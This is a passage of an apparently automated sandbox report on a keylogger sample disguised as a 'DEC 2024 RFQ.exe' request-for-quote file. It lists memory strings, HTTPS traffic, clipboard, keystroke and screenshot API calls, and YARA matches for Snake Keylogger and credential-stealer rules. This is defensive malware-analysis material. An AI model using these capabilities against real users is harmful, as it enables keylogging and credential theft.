String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmp
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00094164
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00094164
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00093F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00093F66
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0008001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0008001C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_000ACABC

                  System Summary

                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: This is a third-party compiled AutoIt script. 0_2_00023B3A
                  Source: DEC 2024 RFQ.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: DEC 2024 RFQ.exe, 00000000.00000000.1663536679.00000000000D4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_51e85504-5
                  Source: DEC 2024 RFQ.exe, 00000000.00000000.1663536679.00000000000D4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_c31cbf44-e
                  Source: DEC 2024 RFQ.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_af6da635-b
                  Source: DEC 2024 RFQ.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_dd332d0a-4
                  Source: initial sample Static PE information: Filename: DEC 2024 RFQ.exe
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0008A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_0008A1EF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00078310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00078310
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_000851BD
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0004D975 0_2_0004D975
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000421C5 0_2_000421C5
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000562D2 0_2_000562D2
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000A03DA 0_2_000A03DA
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0005242E 0_2_0005242E
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000425FA 0_2_000425FA
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0007E616 0_2_0007E616
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0002E6A0 0_2_0002E6A0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000366E1 0_2_000366E1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0005878F 0_2_0005878F
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00038808 0_2_00038808
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00056844 0_2_00056844
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000A0857 0_2_000A0857
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00088889 0_2_00088889
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0004CB21 0_2_0004CB21
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00056DB6 0_2_00056DB6
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00036F9E 0_2_00036F9E
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00033030 0_2_00033030
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00043187 0_2_00043187
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0004F1D9 0_2_0004F1D9
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00021287 0_2_00021287
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00041484 0_2_00041484
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00035520 0_2_00035520
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00047696 0_2_00047696
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00035760 0_2_00035760
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00041978 0_2_00041978
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00059AB5 0_2_00059AB5
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0002FCE0 0_2_0002FCE0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00041D90 0_2_00041D90
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0004BDA6 0_2_0004BDA6
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_000A7DDB 0_2_000A7DDB
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0002DF00 0_2_0002DF00
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_00033FE0 0_2_00033FE0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: 0_2_0173C820 0_2_0173C820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9C19A 1_2_00E9C19A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9D278 1_2_00E9D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E95362 1_2_00E95362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9C468 1_2_00E9C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9C738 1_2_00E9C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E969A0 1_2_00E969A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9E988 1_2_00E9E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9CA08 1_2_00E9CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9CCD8 1_2_00E9CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E99DE0 1_2_00E99DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E96FC8 1_2_00E96FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9CFAA 1_2_00E9CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9F631 1_2_00E9F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9E97A 1_2_00E9E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E9FA88 1_2_00E9FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00E93E09 1_2_00E93E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06581E80 1_2_06581E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_065817A0 1_2_065817A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06589C70 1_2_06589C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06589548 1_2_06589548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06580B30 1_2_06580B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06585028 1_2_06585028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06582968 1_2_06582968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06581E70 1_2_06581E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658DE00 1_2_0658DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658E6B0 1_2_0658E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658E6AF 1_2_0658E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658E6A0 1_2_0658E6A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658EF51 1_2_0658EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658EF60 1_2_0658EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658178F 1_2_0658178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658FC5E 1_2_0658FC5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658FC68 1_2_0658FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06589C6D 1_2_06589C6D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658CCA0 1_2_0658CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658D550 1_2_0658D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658D540 1_2_0658D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658DDFF 1_2_0658DDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658DDF1 1_2_0658DDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658E258 1_2_0658E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658E24A 1_2_0658E24A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658EAF8 1_2_0658EAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658EB08 1_2_0658EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06589328 1_2_06589328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06580B20 1_2_06580B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06588B90 1_2_06588B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658F3B8 1_2_0658F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06588BA0 1_2_06588BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06580040 1_2_06580040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06585018 1_2_06585018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658F810 1_2_0658F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06580017 1_2_06580017
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658F802 1_2_0658F802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658D0F8 1_2_0658D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658295B 1_2_0658295B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658D999 1_2_0658D999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0658D9A8 1_2_0658D9A8
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: String function: 00027DE1 appears 35 times
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: String function: 00040AE3 appears 70 times
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe Code function: String function: 00048900 appears 42 times
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1677993607.0000000004213000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DEC 2024 RFQ.exe
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1678149007.00000000043BD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DEC 2024 RFQ.exe
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs DEC 2024 RFQ.exe
                  Source: DEC 2024 RFQ.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
